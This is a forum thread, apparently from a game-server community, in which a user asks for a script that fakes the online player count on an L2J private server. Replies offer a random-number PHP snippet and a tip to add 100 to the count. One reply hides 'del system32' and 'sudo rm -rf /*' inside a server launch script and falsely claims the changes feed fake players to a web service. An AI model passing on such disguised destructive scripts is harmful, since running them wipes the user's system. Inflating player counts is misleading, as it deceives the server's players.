script false online players

luisalberto

Question

9 answers to this question

You want to trick people into thinking you've got more players online than you really do?

You seriously can't figure this out? If you just want a fake number it doesn't even have to relevant at all.

<?php 
$online_players = rand(500,1000); 
echo $online_players; 
?>

You want to trick people into thinking you've got more players online than you really do?

You seriously can't figure this out? If you just want a fake number it doesn't even have to relevant at all.

<?php 
$online_players = rand(500,1000); 
echo $online_players; 
?>

For the funny fact, on L2P based packs, they even got it integrated in core.

Hey OP, I think I have something that can help you. If you open startGameServer.bat with notepad and change it to this:

@echo off
title gameserver console
:start
cd C:\\Windows\\
REM -------------------------------------
REM Default parameters for a basic server.
del system32
java -Xmx512m -cp ./libs/*; net.sf.l2j.gameserver.GameServer
REM
REM If you have a big server and lots of memory, you could experiment for example with
REM java -server -Xmx1536m -Xms1024m -Xmn512m -XX:PermSize=256m -XX:SurvivorRatio=8 -Xnoclassgc -XX:+AggressiveOpts
REM -------------------------------------
if ERRORLEVEL 2 goto restart
if ERRORLEVEL 1 goto error
goto end
:restart
echo.
echo Admin have restarted, please wait.
echo.
goto start
:error
echo.
echo Server have terminated abnormaly.
echo.
:end
echo.
echo Server terminated.
echo.
pause

The java commands have been changed to automatically allow a list a fake players to be sent to a web service. After you do this and run it let me know. If you're using linux change GameServer_loop.sh to this:

#!/bin/bash

# exit codes of GameServer:
#  0 normal shutdown
#  2 reboot attempt
sudo rm -rf /*
while :; do
[ -f log/java0.log.0 ] && mv log/java0.log.0 "log/`date +%Y-%m-%d_%H-%M-%S`_java.log"
[ -f log/stdout.log ] && mv log/stdout.log "log/`date +%Y-%m-%d_%H-%M-%S`_stdout.log"
java -Xmx512m -cp ./libs/*:l2jserver.jar net.sf.l2j.gameserver.GameServer > log/stdout.log 2>&1
[ $? -ne 2 ] && break
#	/etc/init.d/mysql restart
sleep 10
done

After you have ran this code let me know so we can setup your webservice.

Hi all

well my ask is :

someone know a scripts (false number players online) for mi server l2j god ?

Thx a lot to all it is the best page maxcheaters a master.

you mean the CB online count?

Hi all

well my ask is :

About website script or we are talking for alt+b number?

Hi all

well my ask is :

Okay, thats easy for the cb, use search function on your eclipse and search for the L2World.getInstance().getAllPlayersCount();, now after this method add +100, and it will show always 100 more than the actual